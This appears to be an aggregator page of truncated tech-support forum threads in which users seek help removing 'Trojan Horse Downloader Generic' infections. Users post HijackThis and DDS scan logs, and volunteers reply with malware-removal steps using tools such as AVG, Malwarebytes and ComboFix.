C:\Program Files\Dell\QuickSet\NICCONFIGSVC.exe
C:\Program Files\Intel\Inte... Read more

A:Another computer with Generic Downloader.g Trojan

Do you have the Activescan results
 

3 more replies
Answer Match 69.72%

Two of these picked up following AVG scan ... but AVG says infected objects located inside the archive and cannot be healed

Kindly advise - thanks - Oldie
 

A:Trojan Horse Downloader Generic 1

9 more replies
Answer Match 69.3%

I am infected with Trojan-Downloader.murlo and Trojan.Generic. I use PC Tools Spyware Dr. with Antivirus and I have run ComboFix and Malwarebytes. I have tried deleting all but the latest restore point and running all antivirus and anti-malware programs in safe mode. Eventually my scans were clean, but the trojans keep coming back. how do I eliminate them for good?

A:Trojan-Downloader.murlo & Trojan.Generic

If you are dealing with a malware infection, please be aware that using ComboFix is only one part of the disinfection process. Preliminary scans from other tools like DDS, RSIT and GMER should be used first because they provide comprehensive logs with specific details about files, folders and registry keys which may have been modified by malware infection. Analysis of those logs allows planning an strategy for effective disinfection and a determination if using ComboFix is necessary. As such, ComboFix should not be used without being advised to do so by a trained expert (see here) who is assisting them deal with a malware problem. Since you already ran Combofix, its log should be thoroughly reviewed by experts who have been trained to decipher them before proceeding. ComboFix should have saved that log to the root directory, usually C:\ComboFix.txt. Please follow the instructions in the "Preparation Guide For Requesting Help" starting at Step 6. When you have done that, post the required logs to include your ComboFix log in that forum, NOT here, for assistance by the Malware Response Team Experts.If HelpBot replies to your topic, please follow Step One and CLICK the link so it will report your topic to the team members.

1 more replies
Answer Match 68.88%

I'm trying to fix my friends computer and remove this virus reported by AGV, but it keeps returning. Here is the HiJack Log. Thanks for your help.
Logfile of HijackThis v1.99.1
Scan saved at 10:39:54 PM, on 2/5/2006
Platform: Windows XP SP1 (WinNT 5.01.2600)
MSIE: Internet Explorer v6.00 SP1 (6.00.2800.1106)

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\Explorer.EXE
C:\WINDOWS\system32\spoolsv.exe
C:\WINDOWS\System32\spool\drivers\w32x86\3\hpztsb09.exe
C:\Program Files\HP\hpcoretech\hpcmpmgr.exe
C:\Program Files\Hewlett-Packard\HP Software Update\HPWuSchd.exe
C:\PROGRA~1\Grisoft\AVGFRE~1\avgcc.exe
C:\PROGRA~1\Grisoft\AVGFRE~1\avgemc.exe
C:\Program Files\MSN Messenger\MsnMsgr.Exe
C:\Program Files\Verizon Online\SupportCenter\bin\mpbtn.exe
C:\Program Files\HP\hpcoretech\comp\hptskmgr.exe
C:\PROGRA~1\Grisoft\AVGFRE~1\avgamsvr.exe
C:\PROGRA~1\Grisoft\AVGFRE~1\avgupsvc.exe
C:\WINDOWS\services.exe
C:\WINDOWS\services.exe
C:\WINDOWS\system32\ntvdm.exe
C:\WINDOWS\System32\locator.exe
C:\Program Files\Internet Explorer\iexplore.exe
C:\Program Files\Grisoft\AVG Free\avgwb.dat
C:\Program Files\Grisoft\AVG Free\avgvv.exe
C:\download\HijackThis.exe

R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Window Title = Microsoft Internet Explorer provided by Verizon Online
R1 - HKCU\Software\Microsoft\Windows\Curre... Read more

A:Solved: Trojan Virus Downloader.Generic.QIF

14 more replies
Answer Match 68.88%

Hi all okay wow I honestly have no clue how I got this thing. I have windows 8 Basic 64 bit.

I have this virus and cannot seem to get rid of it. I have tried TDSkiller, I have tired GMR Rikit. I have done Malwarebyte Rikit.

Can anyone help me get rid of this thing?

Thanks so much
 

A:Trojan Horse Downloader.Generic 13.BMKE

16 more replies
Answer Match 68.88%

I am running XP service pack 3 on my dell inspiron 6400 laptop which has 2gb of ram. Yesterday I accidentally downloaded a suspicious file which has installed a trojan virus on my laptop. I have run the AVG computer scanner and i have run spybot (which cant remove one file), i am now running trojanhunter which so far has not found anything.

when i turn on my laptop my firewall has been turned off and when i am surfing on firefox i get pop ups from avg telling me that i have a "trojan horse downloader.generic.8.AICH" when i click heal it tells me that the file is not there and cannot be deleted and when i click move to vault the warning disappears but when i look in the virus vault it is empty.

Does this sound like a dangerous thing to be happening? I am worried that my passwords etc. are in jeopardy.

thanks in advance,
josh

A:Trojan Horse Downloader.Generic.8.AICH

Hello and welcome to TSF

We want all our members to perform the steps outlined in the link I'll give you below, before posting for assistance. There's a sticky at the top of this forum, and a
Quote:




Having problems with spyware and pop-ups? First Steps




link at the top of each page.

---------------------------------------------------------------------------------------------

Please follow our pre-posting process outlined here:

http://www.techsupportforum.com/f50/...lp-305963.html

After running through all the steps, you shall have a proper set of logs. Please post them in a new topic, as this one shall be closed.

If you have trouble with one of the steps, simply move on to the next one, and make note of it in your reply.

Please start a new thread in our Virus/Trojan/Spyware forum along with the required logs

Please note that the Virus/Trojan/Spyware Help forum is extremely busy, and it may take a while to receive a reply.

1 more replies
Answer Match 68.88%

I'm running Xp Pro (SP3). AVG anti-virus... found a registry key with reference to infected fileC:\Program Files\HP\hpcoretech\hpcmpmgr.exe"HKLM\Software\Microsoft\Windows\CurrentVersion\Run\\HP Component ManagerAm I infected or is this a false/positiveJP

A:Trojan Horse Downloader Generic - hpcmpmgr.exe

Do you have an HP Printer (or Printer/Copier/Scanner/Fax) ?Did AVG quarantine the infected files?Please see this post, reply by Moderator boopme, dated Feb 9 2010, 02:36 PM for how to run an ESET scan:(Includes link to ESET)http://www.bleepingcomputer.com/forums/t/293472/hazikubudll-rundll32exe/I am copying/pasting instructions provided by boopme and quietman7 (Moderators on this site): If you have Spybot installed temporarily disable it.Next run ATF:Note: On Vista, "Windows Temp" is disabled. To empty "Windows Temp" ATF-Cleaner must be "Run as an Administrator".Please download ATF Cleaner by Atribune & save it to your desktop.Double-click ATF-Cleaner.exe to run the program.Under Main "Select Files to Delete" choose: Select All.Click the Empty Selected button.If you use Firefox browser click Firefox at the top and choose: Select AllClick the Empty Selected button.
If you would like to keep your saved passwords, please click No at the prompt.If you use Opera browser click Opera at the top and choose: Select AllClick the Empty Selected button.
If you would like to keep your saved passwords, please click No at the prompt.Click Exit on the Main menu to close the program.Next run MBAM (MalwareBytes):NOTE: Before saving MBAM please rename it to zztoy.exe....now save it to your desktop.Please download Malwarebytes Anti-Malware and save it to your desktop.alternate download link MBAM may "make changes to your registry" as part of its disinfection routine. If using other security... Read more

2 more replies
Answer Match 68.88%

I need help removing this trojan:
Trojan Horse Downloader. Generic 7.NTE
winctrl32.dll (Unable to delete)
System is running XP SP3

Please Advise!

HiJackThis.log
Logfile of Trend Micro HijackThis v2.0.2
Scan saved at 7:16:26 AM, on 8/30/2008
Platform: Windows XP SP3 (WinNT 5.01.2600)
MSIE: Internet Explorer v7.00 (7.00.6000.16705)
Boot mode: Normal

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\spoolsv.exe
C:\WINDOWS\Explorer.EXE
C:\PROGRA~1\AVG\AVG8\avgwdsvc.exe
C:\WINDOWS\system32\cisvc.exe
C:\Program Files\Common Files\EPSON\EBAPI\SAgent2.exe
C:\WINDOWS\System32\svchost.exe
C:\Program Files\Java\jre6\bin\jqs.exe
C:\Program Files\Common Files\Microsoft Shared\VS7Debug\mdm.exe
C:\WINDOWS\System32\nvsvc32.exe
C:\WINDOWS\System32\svchost.exe
C:\Program Files\Common Files\Symantec Shared\CCPD-LC\symlcsvc.exe
C:\WINDOWS\system32\SearchIndexer.exe
C:\Program Files\Canon\CAL\CALMAIN.exe
C:\WINDOWS\System32\DSentry.exe
C:\Program Files\Roxio\Easy CD Creator 5\DirectCD\DirectCD.exe
C:\Program Files\Hewlett-Packard\HP Share-to-Web\hpgs2wnd.exe
c:\Program Files\Hewlett-Packard\HP Share-to-Web\hpgs2wnf.exe
C:\Program Files\ScanSoft\OmniPagePro12.0\Opware12.exe
C:\Program Files\Common Files\InstallShield\UpdateService\issch.exe
C:\PROGRA~1\AVG\AVG8\avgrsx.exe
C:\Prog... Read more

A:Trojan Horse Downloader. Generic 7.NTE - Winctrl32.dll

Bump, Please!

8 more replies
Answer Match 68.88%

I am having some trouble removing this from my system. I have used AVG free, Avast free, Spybot, and have even deleted all of the files from the virus reports, in Safe Mode, but I cannot seem to get rid of this little bugger.

The problem manifests itself by telling the user that they have a virus, and suggests that you 'click here' to download the virus removal program. Of course, you end up downloading the virus.

If you need more information to help, I can copy over the reports from AVG.

Perhaps someone has experience with this one and can lead me in the right direction.
 

A:Trojan Horse Downloader.Generic 6.AFLG

Hi and welcome

Go to here and download 'Hijack This!' self installer.
Save it to the desktop or other suitable place. DO NOT just press run from the website
Double click on the file and it will install to C:\program files\hijackthis and create an entry in the start menu.
Click on the entry in start menu to run HijackThis
Click the "Scan" button, when the scan is finished the scan button will become "Save Log" click that and save the log.
Go to where you saved the log and click on "Edit > Select All" then click on "Edit > Copy" then Paste the log back here in a reply.
It will possibly show issues deserving our attention, but most of what it lists will be harmless or even required,
so do NOT fix anything yet.
 

1 more replies
Answer Match 68.88%

My virusscan detected a trojan on my computer which could not be cleaned, quarantined, or deleted. The trojan is called generic downloader.b, with the file name ABoxInst_int14[1].exe.

Here's my HJT log, thanks in advance =)
David

Logfile of HijackThis v1.99.1
Scan saved at 11:40:04 AM, on 18/06/2006
Platform: Windows XP SP2 (WinNT 5.01.2600)
MSIE: Internet Explorer v6.00 SP2 (6.00.2900.2180)

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\spoolsv.exe
C:\WINDOWS\Explorer.EXE
C:\WINDOWS\system32\RunDll32.exe
C:\Program Files\Roxio\Easy CD Creator 6\DragToDisc\DrgToDsc.exe
C:\Program Files\Netropa\Multimedia Keyboard\nhksrv.exe
C:\Program Files\Roxio\Easy CD Creator 6\AudioCentral\RxMon.exe
C:\WINDOWS\system32\cisvc.exe
C:\Program Files\McAfee.com\VSO\mcvsshld.exe
c:\program files\mcafee.com\agent\mcagent.exe
c:\progra~1\mcafee.com\vso\mcvsescn.exe
c:\program files\mcafee.com\agent\mcdetect.exe
C:\WINDOWS\system32\LVCOMSX.EXE
c:\PROGRA~1\mcafee.com\vso\mcshield.exe
C:\Program Files\Logitech\Video\LogiTray.exe
C:\Program Files\Netropa\Multimedia Keyboard\MMKeybd.exe
C:\Program Files\Common Files\Real\Update_OB\realsched.exe
c:\PROGRA~1\mcafee.com\agent\mctskshd.exe
C:\Program Files\iTunes\iTunesHelper.exe
C:\Program Files\Java\jre1.5.0_06\bin\jusched.exe
C:\Progra... Read more

A:Trojan: generic downloader.b - filename ABoxInst_int14[1].exe

Hi theicky and welcome to TSF.

There?s nothing obvious showing in your log, so we?ll do some cleaning and see what turns up.


You may wish to Subscribe to this thread (Thread Tools) so that you are notified when you receive a reply.


Please read these instructions carefully and then print out or copy this page to Notepad in order to assist you when carrying out the fix. You should not have any open browsers when you are following the procedures below.



Downloads
Please download Cleanup! or use this Alternate Link if the main link does not work and install it. You will use this later.
*NOTE* Cleanup deletes EVERYTHING out of temporary folders and does NOT make backups. If you have any files in any TEMP directory and you need to keep them, then please MOVE THEM NOW!


Download Ewido Anti-Malware
Install Ewido Anti-Malware
When installing, under "Additional Options" uncheck..Install background guard
Install scan via context menu

Double-click the icon on Desktop to launch Ewido

You will need to update Ewido to the latest definition files.
On the left hand side of the main screen click update.
Then click on Start Update.
The update will start and a progress bar will show the updates being installed.
If you are having problems with the updater, you can use this link to manually update Ewido.
When you have finished updating, EXIT Ewido.



Reboot
Reboot your system in Safe Mode.Restart the computer. The computer begins processing a se... Read more

1 more replies
Answer Match 68.88%

I've got this new Trojan that everyone seems to be catching. Any thoughts on how to get rid of it? I've got AVG and it keeps healing it, but it just keeps coming back. I normaly use Mozilla, but there are a few sites that I have to use IE for or I would wipe it from my computer. Thanks for any help.

Logfile of HijackThis v1.99.1
Scan saved at 4:29:48 PM, on 4/7/2006
Platform: Windows XP SP2 (WinNT 5.01.2600)
MSIE: Internet Explorer v6.00 SP2 (6.00.2900.2180)

Running processes:
C:\WINNT\System32\smss.exe
C:\WINNT\system32\winlogon.exe
C:\WINNT\system32\services.exe
C:\WINNT\system32\lsass.exe
C:\WINNT\system32\svchost.exe
C:\WINNT\System32\svchost.exe
C:\WINNT\system32\spoolsv.exe
C:\WINNT\Explorer.EXE
C:\Program Files\Common Files\Microsoft Shared\Works Shared\WkUFind.exe
C:\Program Files\Java\jre1.5.0_06\bin\jusched.exe
C:\PROGRA~1\Grisoft\AVGFRE~1\avgcc.exe
C:\PROGRA~1\Grisoft\AVGFRE~1\avgemc.exe
C:\WINNT\system32\RUNDLL32.EXE
C:\Program Files\Common Files\Real\Update_OB\realsched.exe
C:\Program Files\Adobe\Photoshop Elements 4.0\apdproxy.exe
C:\Program Files\iTunes\iTunesHelper.exe
C:\Program Files\QuickTime\qttask.exe
C:\WINNT\system32\ctfmon.exe
C:\Program Files\VIA\RAID\raid_tool.exe
C:\Program Files\Belkin\Nostromo\nost_LM.exe
C:\Program Files\Adobe\Photoshop Elements 4.0\PhotoshopElementsFileAgent.exe
C:\PROGRA~1\Grisoft\AVGFRE~1\avgamsvr.exe
C:\PROGRA~1\Grisoft\AVGFRE~1\avgupsvc.exe
C:\Program Files\ewido anti-malware\ewidoctrl.exe
C:\WINNT\system32\nvsvc... Read more

A:Solved: Trojan horse Downloader.Generic.NON

6 more replies
Answer Match 68.88%

I just have this one lingering infection.
HEUR:Trojan-Downloader.Win32.Generic

Kaspersky always identifies it at the start up and is able to delete it but for some apparent reason, it can't fully get rid of it. It appears every time I start up the PC. I will post a picture of the log.

Not sure what the aswMBR scan log is, if you elaborate I have no problem uploading it or downloading the program to get you it!
Help a brotha out!
Thank you.

-Hugo
 

A:HEUR:Trojan-Downloader.Win32.Generic

I should add that I have also completely disinfected google chrome. Unfortunately it deleted all my bookmarks, maybe someone has a method of recuperating?

AND if all comes to worse, I should also add that I have the free Windows 10 upgrade available to me. I just haven't installed it or found the need to do it.

Thanks!
 

1 more replies
Answer Match 68.88%

AVG is detecting this and said something about C:\Windows\System32\svchost.exe. I just ran Spybot, Adaware, CCleaner, and AVG. (I by mistake installed the Yahoo toolbar with CCleaner ;( )

Logfile of Trend Micro HijackThis v2.0.2
Scan saved at 1:09:48 AM, on 8/6/2008
Platform: Windows XP SP2 (WinNT 5.01.2600)
MSIE: Internet Explorer v6.00 SP2 (6.00.2900.2180)
Boot mode: Normal

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\csrss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\system32\svchost.exe
C:\Program Files\Lavasoft\Ad-Aware\aawservice.exe
C:\WINDOWS\Explorer.EXE
C:\WINDOWS\RTHDCPL.EXE
C:\WINDOWS\SOUNDMAN.EXE
C:\WINDOWS\system32\RUNDLL32.EXE
C:\PROGRA~1\AVG\AVG8\avgtray.exe
C:\Program Files\Java\jre1.6.0_07\bin\jusched.exe
C:\Program Files\Linksys EasyLink Advisor\LinksysAgent.exe
C:\PROGRA~1\AIM\aim.exe
C:\WINDOWS\system32\spoolsv.exe
C:\program files\steam\steam.exe
C:\Program Files\Messenger\msmsgs.exe
C:\PROGRA~1\AVG\AVG8\avgwdsvc.exe
C:\WINDOWS\system32\nvsvc32.exe
C:\WINDOWS\system32\oodag.exe
C:\WINDOWS\system32\wdfmgr.exe
C:\PROGRA~1\AVG\AVG8\avgrsx.exe
C:\PROGRA~1\AVG\AVG8\avgemc.exe
C:\WINDOWS\System32\alg.exe
C:\Program Files\Windows Live\Messenger\msnmsgr.exe
C:\Program Files\Windows Live\Messenger\usnsvc.exe
... Read more

A:Trojan horse downloader generic 7.AMDP

2 more replies
Answer Match 68.88%

Hi i downloaded vundofix and it removed some of the files but there are sitll a few it has left on my daughter has got avg anti virus im not sure on what to do now the files its left on are

c:\winnt\system32\olyegecl.dll
c:\winnt\system32\uvyxx.bak1
c:\winnt\system32\uvyxx.ini
c:\winnt\system32\xxyvu.dll

i dont know if this helps or not but im not sure on what else to do can anyone help.
 

A:Solved: trojan horse downloader.generic.4.dem

16 more replies
Answer Match 68.88%

Hi Guys,

I have borrowed the bosses laptop for a couple of weeks and it has become infected with a few trojan horse viruses.

i need to remove these before i give the laptop back.

i have read other threads with similar problems and i have downloaded HiJack this
any help would be appriciated.

this is the log file

Logfile of HijackThis v1.99.1
Scan saved at 7:11:22 PM, on 19/04/07
Platform: Windows XP SP2 (WinNT 5.01.2600)
MSIE: Internet Explorer v6.00 SP2 (6.00.2900.2180)

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\spoolsv.exe
C:\PROGRA~1\Grisoft\AVGFRE~1\avgamsvr.exe
C:\PROGRA~1\Grisoft\AVGFRE~1\avgupsvc.exe
C:\PROGRA~1\Grisoft\AVGFRE~1\avgemc.exe
C:\WINDOWS\system32\bmwebcfg.exe
C:\Program Files\Common Files\Microsoft Shared\VS7Debug\mdm.exe
C:\Program Files\Analog Devices\SoundMAX\SMAgent.exe
C:\WINDOWS\Explorer.EXE
C:\Program Files\Common Files\Symantec Shared\Security Center\SymWSC.exe
C:\Program Files\Apoint2K\Apoint.exe
C:\Program Files\necmfk\necmfk.exe
C:\WINDOWS\system32\igfxtray.exe
C:\WINDOWS\system32\hkcmd.exe
C:\Program Files\Analog Devices\SoundMAX\SMTray.exe
C:\WINDOWS\AGRSMMSG.exe
C:\Program Files\Java\j2re1.4.2_05\bin\jusched.exe
C:\Program Files\Common Files\Real\Update_OB\realsched.exe
C:\Program Files\Microsoft IntelliPoint\point32.exe
C:\PROGRA~1\Grisoft\AVGFRE~1\avgcc... Read more

More replies
Answer Match 68.88%

I am looking for advice on a Trojan horse virus that was picked up by AVG on my computer. The virus is called trojan horse downloader.generic.13.BVLU. I've done a search online and can't find anything on this specific virus.
Although AVG spotted the virus I am not sure if it was blocked or whether it has infected my computer. I have deleted the file that AVG said the virus was found in and I have carried out scans using AVG, Avast, Malwarebytes and Kaspersky TDSSKiller. None of these has detected an infection. Should i assume there is no infection or can this virus hide away from the above scanners? Is there something else i can do to determine for sure if my computer is infected or not?
Thanks

A:trojan horse downloader.generic.13.BVLU

Welcome aboard   Download Security Check from here or here and save it to your Desktop. Double-click SecurityCheck.exe Follow the onscreen instructions inside of the black box. A Notepad document should open automatically called checkup.txt; please post the contents of that document.NOTE 1. If one of your security applications (e.g., third-party firewall) requests permission to allow DIG.EXE access the Internet, allow it to do so.NOTE 2 SecurityCheck may produce some false warning(s), so leave the results reading to me. Please download Farbar Service Scanner (FSS) and run it on the computer with the issue.Make sure the following options are checked:
Internet ServicesWindows FirewallSystem RestoreSecurity Center/Action CenterWindows UpdateWindows DefenderOther ServicesPress "Scan".It will create a log (FSS.txt) in the same directory the tool is run.Please copy and paste the log to your reply. Please download MiniToolBox and run it.Checkmark following boxes:Report IE Proxy SettingsReport FF Proxy SettingsList content of HostsList IP configurationList Winsock EntriesList last 10 Event Viewer logList Installed ProgramsList Devices (do NOT change any settings here)List Users, Partitions and Memory sizeClick Go and post the result. Download Malwarebytes' Anti-Malware (aka MBAM): http://www.malwarebytes.org/products/malwarebytes_free to your desktop.* Double-click mbam-setup.exe and follow the prompts to install the program.* At the end, be sure a checkmark is placed next to Up... Read more

13 more replies
Answer Match 68.88%

Something disabled my AVG 8.0. I downloaded AVG 8.5 and ran a scan. In addition to a list of tracking cookies AVG reported finding "Trojan Horse Downloader. Generic 8.BMXD" I don't know how long AVG was down or what I might have downloaded while I was unprotected. Computer is sluggish.

DDS (Ver_09-07-30.01) - NTFSx86
Run by Craig at 15:59:17.71 on Sun 09/13/2009
Internet Explorer: 6.0.2900.5512
Microsoft Windows XP Professional 5.1.2600.3.1252.1.1033.18.1014.405 [GMT -5:00]

AV: AVG Anti-Virus Free *On-access scanning disabled* (Updated) {17DDD097-36FF-435F-9E1B-52D74245D6BF}

============== Running Processes ===============

C:\WINDOWS\system32\svchost -k DcomLaunch
svchost.exe
C:\Program Files\Windows Defender\MsMpEng.exe
C:\WINDOWS\System32\svchost.exe -k netsvcs
svchost.exe
svchost.exe
C:\WINDOWS\system32\spoolsv.exe
svchost.exe
C:\PROGRA~1\AVG\AVG8\avgwdsvc.exe
C:\WINDOWS\System32\svchost.exe -k HTTPFilter
C:\Program Files\IBM\IBM Rapid Restore Ultra\rrpcsb.exe
C:\Program Files\Analog Devices\SoundMAX\SMAgent.exe
C:\WINDOWS\system32\svchost.exe -k imgsvc
C:\Program Files\Common Files\Lenovo\tvt_reg_monitor_svc.exe
C:\Program Files\Common Files\Lenovo\Scheduler\tvtsched.exe
c:\program files\lenovo\system update\suservice.exe
C:\WINDOW... Read more

A:trojan horse downloader Generic 8.BMXD

Hello and welcome to Bleeping ComputerWe apologize for the delay in responding to your request for help. Here at Bleeping Computer we get overwhelmed at times, and we are trying our best to keep up. Please note that your topic was not intentionally overlooked. Our mission is to help everyone in need, but sometimes it takes just a little longer to get to every request for help. No one is ignored here.If you have since resolved the original problem you were having, we would appreciate you letting us know. If not please perform the following steps below so we can have a look at the current condition of your machine. If you have not done so, include a clear description of the problems you're having, along with any steps you may have performed so far.Upon completing the steps below another staff member will review and take the steps necessary with you to get your machine back in working order clean and free of malware.If you have already posted a DDS log, please do so again, as your situation may have changed.Use the 'Add Reply' and add the new log to this thread.Thanks and again sorry for the delay.We need to see some information about what is happening in your machine. Please perform the following scan:Download DDS by sUBs from one of the following links. Save it to your desktop.DDS.scrDDS.pifDouble click on the DDS icon, allow it to run.A small box will open, with an explaination about the tool. No input is needed, the scan is running.Notepad will open with the results.Foll... Read more

18 more replies
Answer Match 68.88%

Dear Tech Support Guys

I have a virus on my pc - avg says that it is trojan downloader generic 13 but I cannot get rid of it using avg or anti malware software. I attach the HijackThis log, dds logs and ark.txt log and would be very very grateful for any assistance. The virus has wiped off a lot of files on my pc and when I go to the start menu, I cannot locate "run" to enter instructions I have read about. Whenever I access the internet, I am directed towards various websites I did not request.

Logfile of Trend Micro HijackThis v2.0.4
Scan saved at 20:33:25, on 14/11/2012
Platform: Windows 7 SP1 (WinNT 6.00.3505)
MSIE: Internet Explorer v9.00 (9.00.8112.16421)
Boot mode: Normal

Running processes:
C:\Program Files (x86)\TOSHIBA\Toshiba Online Product Information\TOPI.exe
C:\Program Files (x86)\Windows Live\Messenger\msnmsgr.exe
C:\Program Files (x86)\TOSHIBA\TOSHIBA Web Camera Application\TWebCamera.exe
C:\Program Files (x86)\Epson Software\Event Manager\EEventManager.exe
C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe
C:\Program Files (x86)\Internet Explorer\iexplore.exe
C:\Program Files (x86)\Internet Explorer\iexplore.exe
C:\Program Files (x86)\Microsoft Office\Office12\WINWORD.EXE
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\Program Files (x86)\... Read more

More replies
Answer Match 68.04%

Hi Techguy! My home page has been hijacked by about:blank, & avg keeps telling me it's found the above trojan horse.I've run avg, ad-aware & spybot, with no joy. I don't know what info you need, but we run on Windows XP. I've run hijack this, here's my log file.

Logfile of HijackThis v1.99.1
Scan saved at 2:42:26 PM, on 4/3/2006
Platform: Windows XP SP2 (WinNT 5.01.2600)
MSIE: Internet Explorer v6.00 SP2 (6.00.2900.2180)

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\Program Files\Ahead\InCD\InCDsrv.exe
C:\WINDOWS\system32\LEXBCES.EXE
C:\WINDOWS\system32\spoolsv.exe
C:\WINDOWS\system32\LEXPPS.EXE
C:\WINDOWS\Explorer.EXE
C:\WINDOWS\system32\nvctrl.exe
C:\WINDOWS\SOUNDMAN.EXE
C:\Program Files\Java\jre1.5.0_06\bin\jusched.exe
C:\Program Files\Ahead\InCD\InCD.exe
C:\Program Files\CyberLink\PowerDVD\PDVDServ.exe
C:\Program Files\iTunes\iTunesHelper.exe
C:\Program Files\QuickTime\qttask.exe
C:\PROGRA~1\Grisoft\AVGFRE~1\avgcc.exe
C:\Program Files\Common Files\Real\Update_OB\realsched.exe
C:\Program Files\MessengerPlus! 3\MsgPlus.exe
C:\Program Files\WordWeb\wweb32.exe
C:\PROGRA~1\Grisoft\AVGFRE~1\avgamsvr.exe
C:\PROGRA~1\Grisoft\AVGFRE~1\avgupsvc.exe
C:\PROGRA~1\Grisoft\AVGFRE~1\avgemc.exe
C:\WINDOWS\system32\slmdmsr.exe
C:\WINDOWS\system32\svchost.exe
C:\Program Files\iPod\bin\iPodServ... Read more

A:Solved: about:blank & trojan horse downloader generic.NON

16 more replies
Answer Match 68.04%

Hi. I've been trying to get ride of some viruses to no avail. It slows down my internet connection and I can't even update ewido, avg, spybot and adaware because I think the virus prevents my computer from connecting to ther internet properly. I tried cleaning it with AVG and ewido to no avail becuase it keeps coming back. I tried online scans but my net connection tends to "hang" after 5 minutes so it never gets done. My PC also hangs a lot.

Help please. THanks!Here is my scan report from Ewido and my Hijack This

Log:



Logfile of HijackThis v1.99.1
Scan saved at 11:46:07 PM, on 11/3/2005
Platform: Windows XP SP1 (WinNT 5.01.2600)
MSIE: Internet Explorer v6.00 SP1 (6.00.2800.1106)

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\spoolsv.exe
C:\PROGRA~1\Grisoft\AVGFRE~1\avgamsvr.exe
C:\PROGRA~1\Grisoft\AVGFRE~1\avgupsvc.exe
C:\Program Files\ewido\security suite\ewidoctrl.exe
C:\WINDOWS\System32\Fast.exe
C:\Program Files\Common Files\Microsoft Shared\VS7Debug\mdm.exe
C:\WINDOWS\msinit.exe
C:\WINDOWS\mspathfinder
C:\WINDOWS\Explorer.EXE
C:\WINDOWS\System32\tp4mon.exe
C:\PROGRA~1\Grisoft\AVGFRE~1\avgcc.exe
C:\PROGRA~1\Grisoft\AVGFRE~1\avgemc.exe
C:\Program Files\Java\jre1.5.0_04\bin\jusched.exe
C:\WINDOWS\System32\msconfigx32.exe
C:\WINDOWS\System32\s3hotk... Read more

A:can't get rid of stubborn viruses: Trojan horse Downloader.Generic.Lf, etc.

Please Turn off Word Wrap in your text editing program then post a new log. In Notepad this is done by clicking on Word Wrap in the Edit menu to remove the check. This will make the log much easier for the analysts to read.

1 more replies
Answer Match 68.04%

... and a partridge in a pear tree. Hello and thank you in advance for your help. The following applies to my Win7 PC running the IE9 browser.

I need assistance in order to remove a rootkit IRP Hook\Driver\iaStor IRP_MJ_INTERNAL_DEVICE_CONTROL -> 0xFFFFFA8005F965A4 (the numbers after the the first A vary with each scan) and Trojan horse downloaders Generic25.BCBS C:\Windows\System32\svchost.exe (1688):\memory_00d00000 and Generic13.CAM C:\Windows\System32\svchost.exe (1688):\memory_00a00000 (the numbers after svchost.exe and memory vary with each scan). I cannot get rid of these three.

I tried MS Security Essentials first, MS Defender, then AVG, including the rescue CD, and Malwarebytes. I have also run rkill. AVG was the only one to even pick them up. I'm told to reboot and all would be well, alas, that is not so. The three apps removed many other viruses found, such as Exploit.Kit.AI and Win32/Heur.dropper but not these three buggers. TDSSKiller will not run, even after renaming, nor will aswMBR - though I didn't rename that as I don't believe I saw that as an option. I have uninstalled and reinstalled Java and Adobe (haven't reinstalled the Reader yet and just reinstalled Flash from this site when registering) and have used the Intel utility driver update check to attempt a fix for iastor.exe. (nothing major there - just optional display update available).

Love an IT puzzle - but I've about ha... Read more

A:IRP Hook Rootkit, Trojan Downloader Generic, IE9 redirects, pop ups

Greetings and Welcome to The Forums!!My name is Gringo and I'll be glad to help you with your malware problems.I have put together somethings for you to keep in mind while I am helping you to make things go easier and faster for both of usPlease do not run any tools unless instructed to do so.
We ask you to run different tools in a specific order to ensure the malware is completely removed from your machine, and running any additional tools may detect false positives, interfere with our tools, or cause unforeseen damage or system instability.Please do not attach logs or use code boxes, just copy and paste the text.
Due to the high volume of logs we receive it helps to receive everything in the same format, and code boxes make the logs very difficult to read. Also, attachments require us to download and open the reports when it is easier to just read the reports in your post.Please read every post completely before doing anything.
Pay special attention to the NOTE: lines, these entries identify an individual issue or important step in the cleanup process.Please provide feedback about your experience as we go.
A short statement describing how the computer is working helps us understand where to go next, for example: I am still getting redirected, the computer is running normally, etc. Please do not describe the computer as "the same", this requires the extra step of looking back at your previous post.NOTE: At the top o... Read more

32 more replies
Answer Match 68.04%

